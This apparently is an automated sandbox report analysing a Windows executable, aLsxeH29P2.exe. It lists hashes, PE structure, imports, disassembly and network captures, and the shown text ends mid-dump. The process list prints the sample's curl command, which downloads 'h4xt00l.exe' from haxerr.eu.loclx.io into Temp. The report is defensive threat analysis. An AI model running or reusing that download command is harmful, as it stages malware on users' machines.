                                                                                    Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 2036 0 2036 0 0 964 0 --:--:-- 0:00:02 --:--:-- 965.100 2036 0 2036 0 0 961 0 --:--:-- 0:00:02 --:--:-- 962..
                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Entropy (8bit):7.991043623348911
                                                                                    TrID:
                                                                                    • Win64 Executable GUI (202006/5) 77.37%
                                                                                    • InstallShield setup (43055/19) 16.49%
                                                                                    • Win64 Executable (generic) (12005/4) 4.60%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                    • DOS Executable Generic (2002/1) 0.77%
                                                                                    File name:aLsxeH29P2.exe
                                                                                    File size:7'178'619 bytes
                                                                                    MD5:43f63dde42af90b34befb25ca46e33d7
                                                                                    SHA1:2ad1824df97e3d1275521faed88ede96fe41e035
                                                                                    SHA256:8bd6a723809e23d1c14d7ff528e16e996a3b0b0432e2b7feb4eb5db52c542173
                                                                                    SHA512:e75b1321a6faada88025a6bc1ccb7da197bc3cbe3bd3f13ac01471703e0194be50025006df968881139723a46f6eb448f7c28ddc76f80cb1ec7e68122964b528
                                                                                    SSDEEP:196608:iiCFVEyXMCHGLLc54i1wN+ijXx5nDasqWQ2dTNUGqlf+iITxKvM:BCFVEyXMCHWUj6jx5WsqWxTwITEU
                                                                                    TLSH:A476335553E04DF5E8F7813EE8A3945AEA71B4470764CA9B93D812D20F232E07E78F62
                                                                                    Icon Hash:90cececece8e8eb0
                                                                                    Entrypoint:0x14000cdb0
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x140000000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x673F6874 [Thu Nov 21 17:05:56 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:6
                                                                                    OS Version Minor:0
                                                                                    File Version Major:6
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:6
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                    Instruction
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007FA20D27139Ch
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    jmp 00007FA20D270FBFh
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    call 00007FA20D271768h
                                                                                    test eax, eax
                                                                                    je 00007FA20D271163h
                                                                                    dec eax
                                                                                    mov eax, dword ptr [00000030h]
                                                                                    dec eax
                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                    jmp 00007FA20D271147h
                                                                                    dec eax
                                                                                    cmp ecx, eax
                                                                                    je 00007FA20D271156h
                                                                                    xor eax, eax
                                                                                    dec eax
                                                                                    cmpxchg dword ptr [0003577Ch], ecx
                                                                                    jne 00007FA20D271130h
                                                                                    xor al, al
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    mov al, 01h
                                                                                    jmp 00007FA20D271139h
                                                                                    int3
                                                                                    int3
                                                                                    int3
                                                                                    dec eax
                                                                                    sub esp, 28h
                                                                                    test ecx, ecx
                                                                                    jne 00007FA20D271149h
                                                                                    mov byte ptr [00035765h], 00000001h
                                                                                    call 00007FA20D270895h
                                                                                    call 00007FA20D271B80h
                                                                                    test al, al
                                                                                    jne 00007FA20D271146h
                                                                                    xor al, al
                                                                                    jmp 00007FA20D271156h
                                                                                    call 00007FA20D27E69Fh
                                                                                    test al, al
                                                                                    jne 00007FA20D27114Bh
                                                                                    xor ecx, ecx
                                                                                    call 00007FA20D271B90h
                                                                                    jmp 00007FA20D27112Ch
                                                                                    mov al, 01h
                                                                                    dec eax
                                                                                    add esp, 28h
                                                                                    ret
                                                                                    int3
                                                                                    int3
                                                                                    inc eax
                                                                                    push ebx
                                                                                    dec eax
                                                                                    sub esp, 20h
                                                                                    cmp byte ptr [0003572Ch], 00000000h
                                                                                    mov ebx, ecx
                                                                                    jne 00007FA20D2711A9h
                                                                                    cmp ecx, 01h
                                                                                    jnbe 00007FA20D2711ACh
                                                                                    call 00007FA20D2716DEh
                                                                                    test eax, eax
                                                                                    je 00007FA20D27116Ah
                                                                                    test ebx, ebx
                                                                                    jne 00007FA20D271166h
                                                                                    dec eax
                                                                                    lea ecx, dword ptr [00035716h]
                                                                                    call 00007FA20D27E492h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca5c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x568 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2250 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f00 | 0x2a000 | a6c3b829cc8eaabb1a474c227e90407f | False | 0.5514206659226191 | data | 6.487493643901088 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a50 | 0x12c00 | 7541b94dd9589e5198aee6944205e876 | False | 0.5245052083333334 | data | 5.752722538344455 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2250 | 0x2400 | 181312260a85d10a1454ba38901c499b | False | 0.4705946180555556 | data | 5.290347578351011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x568 | 0x600 | 1f909f1505d4aac403fc692b4e3c4933 | False | 0.4375 | data | 5.515698942150982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x47058 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 11, 2024 11:30:11.025300026 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:11.025362015 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:11.025429964 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:11.035039902 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:11.035065889 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.418260098 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.418359995 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.423098087 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.423115015 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.423389912 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.427176952 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.467328072 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.811297894 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.811394930 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.811465979 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |
| Dec 11, 2024 11:30:12.811469078 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.811511993 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.836497068 CET | 49732 | 443 | 192.168.2.4 | 167.99.38.229 |
| Dec 11, 2024 11:30:12.836549997 CET | 443 | 49732 | 167.99.38.229 | 192.168.2.4 |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 11, 2024 11:30:10.714101076 CET | 64624 | 53 | 192.168.2.4 | 1.1.1.1 |
| Dec 11, 2024 11:30:11.017467022 CET | 53 | 64624 | 1.1.1.1 | 192.168.2.4 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 11, 2024 11:30:10.714101076 CET | 192.168.2.4 | 1.1.1.1 | 0xa9e8 | Standard query (0) | haxerr.eu.loclx.io | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 11, 2024 11:30:11.017467022 CET | 1.1.1.1 | 192.168.2.4 | 0xa9e8 | No error (0) | haxerr.eu.loclx.io | eu.loclx.io | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 11, 2024 11:30:11.017467022 CET | 1.1.1.1 | 192.168.2.4 | 0xa9e8 | No error (0) | eu.loclx.io | | 167.99.38.229 | A (IP address) | IN (0x0001) | false |
                                                                                    • haxerr.eu.loclx.io
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49732 | 167.99.38.229 | 443 | 7384 | C:\Windows\System32\curl.exe |
Timestamp: 2024-12-11 10:30:12 UTC, Bytes transferred: 93, Direction: OUT
Data:
GET /h4xt00l.exe HTTP/1.1
Host: haxerr.eu.loclx.io
User-Agent: curl/7.83.1
Accept: */*

Timestamp: 2024-12-11 10:30:12 UTC, Bytes transferred: 51, Direction: IN
Data Ascii: HTTP/1.0 404 Not FoundContent-Type: text/html

Timestamp: 2024-12-11 10:30:12 UTC, Bytes transferred: 1138, Direction: IN
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.go

Timestamp: 2024-12-11 10:30:12 UTC, Bytes transferred: 898, Direction: IN
Data Ascii: : translate(-50% , -50%); font-size: 224px; font-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 {


                                                                                    Target ID:0
                                                                                    Start time:05:30:09
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\aLsxeH29P2.exe"
                                                                                    Imagebase:0x7ff7f3dd0000
                                                                                    File size:7'178'619 bytes
                                                                                    MD5 hash:43F63DDE42AF90B34BEFB25CA46E33D7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:1
                                                                                    Start time:05:30:09
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\aLsxeH29P2.exe"
                                                                                    Imagebase:0x7ff7f3dd0000
                                                                                    File size:7'178'619 bytes
                                                                                    MD5 hash:43F63DDE42AF90B34BEFB25CA46E33D7
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:2
                                                                                    Start time:05:30:10
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Windows\System32\curl.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe
                                                                                    Imagebase:0x7ff7e0980000
                                                                                    File size:530'944 bytes
                                                                                    MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:05:30:10
                                                                                    Start date:11/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                      Execution Graph

                                                                                      Execution Coverage:8.6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:20.1%
                                                                                      Total number of Nodes:2000
                                                                                      Total number of Limit Nodes:29
7ff7f3dd92d2 16555->16557 16556->16557 16558 7ff7f3ddc550 _log10_special 8 API calls 16557->16558 16559 7ff7f3dd371a 16558->16559 16559->16193 16559->16194 16561 7ff7f3ddc850 16560->16561 16562 7ff7f3dd2c70 GetCurrentProcessId 16561->16562 16591 7ff7f3dd26b0 16562->16591 16564 7ff7f3dd2cb9 16595 7ff7f3de4bd8 16564->16595 16567 7ff7f3dd26b0 48 API calls 16568 7ff7f3dd2d34 FormatMessageW 16567->16568 16570 7ff7f3dd2d7f MessageBoxW 16568->16570 16571 7ff7f3dd2d6d 16568->16571 16572 7ff7f3ddc550 _log10_special 8 API calls 16570->16572 16573 7ff7f3dd26b0 48 API calls 16571->16573 16574 7ff7f3dd2daf 16572->16574 16573->16570 16574->16206 16576 7ff7f3dd9340 GetFinalPathNameByHandleW CloseHandle 16575->16576 16577 7ff7f3dd3730 16575->16577 16576->16577 16577->16201 16577->16205 16579 7ff7f3dd2834 16578->16579 16580 7ff7f3dd26b0 48 API calls 16579->16580 16581 7ff7f3dd2887 16580->16581 16582 7ff7f3de4bd8 48 API calls 16581->16582 16583 7ff7f3dd28d0 MessageBoxW 16582->16583 16584 7ff7f3ddc550 _log10_special 8 API calls 16583->16584 16585 7ff7f3dd2900 16584->16585 16585->16206 16587 7ff7f3dd946a WideCharToMultiByte 16586->16587 16588 7ff7f3dd9495 16586->16588 16587->16588 16590 7ff7f3dd94ab __std_exception_copy 16587->16590 16589 7ff7f3dd94b2 WideCharToMultiByte 16588->16589 16588->16590 16589->16590 16590->16198 16592 7ff7f3dd26d5 16591->16592 16593 7ff7f3de4bd8 48 API calls 16592->16593 16594 7ff7f3dd26f8 16593->16594 16594->16564 16597 7ff7f3de4c32 16595->16597 16596 7ff7f3de4c57 16598 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16596->16598 16597->16596 16599 7ff7f3de4c93 16597->16599 16602 7ff7f3de4c81 16598->16602 16613 7ff7f3de2f90 16599->16613 16601 7ff7f3de4d74 16604 7ff7f3dea948 __free_lconv_num 11 API calls 16601->16604 16603 7ff7f3ddc550 _log10_special 8 API calls 16602->16603 16605 7ff7f3dd2d04 16603->16605 16604->16602 16605->16567 16607 7ff7f3de4d9a 16607->16601 16609 7ff7f3de4da4 16607->16609 16608 7ff7f3de4d49 16610 7ff7f3dea948 __free_lconv_num 11 
API calls 16608->16610 16612 7ff7f3dea948 __free_lconv_num 11 API calls 16609->16612 16610->16602 16611 7ff7f3de4d40 16611->16601 16611->16608 16612->16602 16614 7ff7f3de2fce 16613->16614 16615 7ff7f3de2fbe 16613->16615 16616 7ff7f3de2fd7 16614->16616 16621 7ff7f3de3005 16614->16621 16619 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16615->16619 16617 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16616->16617 16618 7ff7f3de2ffd 16617->16618 16618->16601 16618->16607 16618->16608 16618->16611 16619->16618 16621->16615 16621->16618 16624 7ff7f3de39a4 16621->16624 16657 7ff7f3de33f0 16621->16657 16694 7ff7f3de2b80 16621->16694 16625 7ff7f3de39e6 16624->16625 16626 7ff7f3de3a57 16624->16626 16627 7ff7f3de3a81 16625->16627 16628 7ff7f3de39ec 16625->16628 16629 7ff7f3de3ab0 16626->16629 16630 7ff7f3de3a5c 16626->16630 16717 7ff7f3de1d54 16627->16717 16631 7ff7f3de3a20 16628->16631 16632 7ff7f3de39f1 16628->16632 16636 7ff7f3de3ac7 16629->16636 16637 7ff7f3de3aba 16629->16637 16641 7ff7f3de3abf 16629->16641 16633 7ff7f3de3a91 16630->16633 16634 7ff7f3de3a5e 16630->16634 16639 7ff7f3de39f7 16631->16639 16631->16641 16632->16636 16632->16639 16724 7ff7f3de1944 16633->16724 16635 7ff7f3de3a00 16634->16635 16644 7ff7f3de3a6d 16634->16644 16656 7ff7f3de3af0 16635->16656 16697 7ff7f3de4158 16635->16697 16731 7ff7f3de46ac 16636->16731 16637->16627 16637->16641 16639->16635 16645 7ff7f3de3a32 16639->16645 16652 7ff7f3de3a1b 16639->16652 16641->16656 16735 7ff7f3de2164 16641->16735 16644->16627 16647 7ff7f3de3a72 16644->16647 16645->16656 16707 7ff7f3de4494 16645->16707 16647->16656 16713 7ff7f3de4558 16647->16713 16649 7ff7f3ddc550 _log10_special 8 API calls 16651 7ff7f3de3dea 16649->16651 16651->16621 16655 7ff7f3de3cdc 16652->16655 16652->16656 16742 7ff7f3de47c0 16652->16742 16655->16656 16748 7ff7f3deea08 16655->16748 16656->16649 16658 7ff7f3de3414 16657->16658 16659 7ff7f3de33fe 16657->16659 16660 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16658->16660 
16661 7ff7f3de3454 16658->16661 16659->16661 16662 7ff7f3de39e6 16659->16662 16663 7ff7f3de3a57 16659->16663 16660->16661 16661->16621 16664 7ff7f3de3a81 16662->16664 16665 7ff7f3de39ec 16662->16665 16666 7ff7f3de3ab0 16663->16666 16667 7ff7f3de3a5c 16663->16667 16675 7ff7f3de1d54 38 API calls 16664->16675 16668 7ff7f3de3a20 16665->16668 16669 7ff7f3de39f1 16665->16669 16673 7ff7f3de3ac7 16666->16673 16674 7ff7f3de3aba 16666->16674 16679 7ff7f3de3abf 16666->16679 16670 7ff7f3de3a91 16667->16670 16671 7ff7f3de3a5e 16667->16671 16676 7ff7f3de39f7 16668->16676 16668->16679 16669->16673 16669->16676 16677 7ff7f3de1944 38 API calls 16670->16677 16672 7ff7f3de3a00 16671->16672 16681 7ff7f3de3a6d 16671->16681 16678 7ff7f3de4158 47 API calls 16672->16678 16692 7ff7f3de3af0 16672->16692 16680 7ff7f3de46ac 45 API calls 16673->16680 16674->16664 16674->16679 16689 7ff7f3de3a1b 16675->16689 16676->16672 16682 7ff7f3de3a32 16676->16682 16676->16689 16677->16689 16678->16689 16683 7ff7f3de2164 38 API calls 16679->16683 16679->16692 16680->16689 16681->16664 16684 7ff7f3de3a72 16681->16684 16685 7ff7f3de4494 46 API calls 16682->16685 16682->16692 16683->16689 16687 7ff7f3de4558 37 API calls 16684->16687 16684->16692 16685->16689 16686 7ff7f3ddc550 _log10_special 8 API calls 16688 7ff7f3de3dea 16686->16688 16687->16689 16688->16621 16690 7ff7f3de47c0 45 API calls 16689->16690 16689->16692 16693 7ff7f3de3cdc 16689->16693 16690->16693 16691 7ff7f3deea08 46 API calls 16691->16693 16692->16686 16693->16691 16693->16692 16967 7ff7f3de0fc8 16694->16967 16698 7ff7f3de417e 16697->16698 16760 7ff7f3de0b80 16698->16760 16703 7ff7f3de47c0 45 API calls 16706 7ff7f3de42c3 16703->16706 16704 7ff7f3de4351 16704->16652 16704->16704 16705 7ff7f3de47c0 45 API calls 16705->16704 16706->16704 16706->16705 16706->16706 16709 7ff7f3de44c9 16707->16709 16708 7ff7f3de450e 16708->16652 16709->16708 16710 7ff7f3de44e7 16709->16710 16711 7ff7f3de47c0 45 API calls 16709->16711 16712 7ff7f3deea08 46 API calls 
16710->16712 16711->16710 16712->16708 16716 7ff7f3de4579 16713->16716 16714 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16715 7ff7f3de45aa 16714->16715 16715->16652 16716->16714 16716->16715 16718 7ff7f3de1d87 16717->16718 16719 7ff7f3de1db6 16718->16719 16721 7ff7f3de1e73 16718->16721 16723 7ff7f3de1df3 16719->16723 16899 7ff7f3de0c28 16719->16899 16722 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16721->16722 16722->16723 16723->16652 16725 7ff7f3de1977 16724->16725 16726 7ff7f3de19a6 16725->16726 16728 7ff7f3de1a63 16725->16728 16727 7ff7f3de0c28 12 API calls 16726->16727 16730 7ff7f3de19e3 16726->16730 16727->16730 16729 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16728->16729 16729->16730 16730->16652 16732 7ff7f3de46ef 16731->16732 16734 7ff7f3de46f3 __crtLCMapStringW 16732->16734 16907 7ff7f3de4748 16732->16907 16734->16652 16736 7ff7f3de2197 16735->16736 16737 7ff7f3de21c6 16736->16737 16739 7ff7f3de2283 16736->16739 16738 7ff7f3de0c28 12 API calls 16737->16738 16741 7ff7f3de2203 16737->16741 16738->16741 16740 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16739->16740 16740->16741 16741->16652 16743 7ff7f3de47d7 16742->16743 16911 7ff7f3ded9b8 16743->16911 16749 7ff7f3deea47 16748->16749 16750 7ff7f3deea39 16748->16750 16749->16655 16750->16749 16751 7ff7f3deea67 16750->16751 16752 7ff7f3de47c0 45 API calls 16750->16752 16753 7ff7f3deea9f 16751->16753 16754 7ff7f3deea78 16751->16754 16752->16751 16753->16749 16756 7ff7f3deeb2a 16753->16756 16758 7ff7f3deeac9 16753->16758 16957 7ff7f3df00a0 16754->16957 16757 7ff7f3def8a0 _fread_nolock MultiByteToWideChar 16756->16757 16757->16749 16758->16749 16960 7ff7f3def8a0 16758->16960 16761 7ff7f3de0ba6 16760->16761 16762 7ff7f3de0bb7 16760->16762 16768 7ff7f3dee570 16761->16768 16762->16761 16763 7ff7f3ded5fc _fread_nolock 12 API calls 16762->16763 16764 7ff7f3de0be4 16763->16764 16765 7ff7f3de0bf8 16764->16765 16766 7ff7f3dea948 __free_lconv_num 11 API calls 16764->16766 16767 
7ff7f3dea948 __free_lconv_num 11 API calls 16765->16767 16766->16765 16767->16761 16769 7ff7f3dee5c0 16768->16769 16770 7ff7f3dee58d 16768->16770 16769->16770 16773 7ff7f3dee5f2 16769->16773 16771 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16770->16771 16781 7ff7f3de42a1 16771->16781 16772 7ff7f3dee705 16774 7ff7f3dee7f7 16772->16774 16776 7ff7f3dee7bd 16772->16776 16778 7ff7f3dee78c 16772->16778 16780 7ff7f3dee74f 16772->16780 16782 7ff7f3dee745 16772->16782 16773->16772 16785 7ff7f3dee63a 16773->16785 16823 7ff7f3deda5c 16774->16823 16816 7ff7f3deddf4 16776->16816 16809 7ff7f3dee0d4 16778->16809 16799 7ff7f3dee304 16780->16799 16781->16703 16781->16706 16782->16776 16784 7ff7f3dee74a 16782->16784 16784->16778 16784->16780 16785->16781 16790 7ff7f3dea4a4 16785->16790 16788 7ff7f3dea900 _isindst 17 API calls 16789 7ff7f3dee854 16788->16789 16791 7ff7f3dea4b1 16790->16791 16792 7ff7f3dea4bb 16790->16792 16791->16792 16797 7ff7f3dea4d6 16791->16797 16793 7ff7f3de4f08 _get_daylight 11 API calls 16792->16793 16794 7ff7f3dea4c2 16793->16794 16832 7ff7f3dea8e0 16794->16832 16796 7ff7f3dea4ce 16796->16781 16796->16788 16797->16796 16798 7ff7f3de4f08 _get_daylight 11 API calls 16797->16798 16798->16794 16835 7ff7f3df40ac 16799->16835 16803 7ff7f3dee3ac 16804 7ff7f3dee401 16803->16804 16805 7ff7f3dee3cc 16803->16805 16808 7ff7f3dee3b0 16803->16808 16888 7ff7f3dedef0 16804->16888 16884 7ff7f3dee1ac 16805->16884 16808->16781 16810 7ff7f3df40ac 38 API calls 16809->16810 16811 7ff7f3dee11e 16810->16811 16812 7ff7f3df3af4 37 API calls 16811->16812 16813 7ff7f3dee16e 16812->16813 16814 7ff7f3dee172 16813->16814 16815 7ff7f3dee1ac 45 API calls 16813->16815 16814->16781 16815->16814 16817 7ff7f3df40ac 38 API calls 16816->16817 16818 7ff7f3dede3f 16817->16818 16819 7ff7f3df3af4 37 API calls 16818->16819 16820 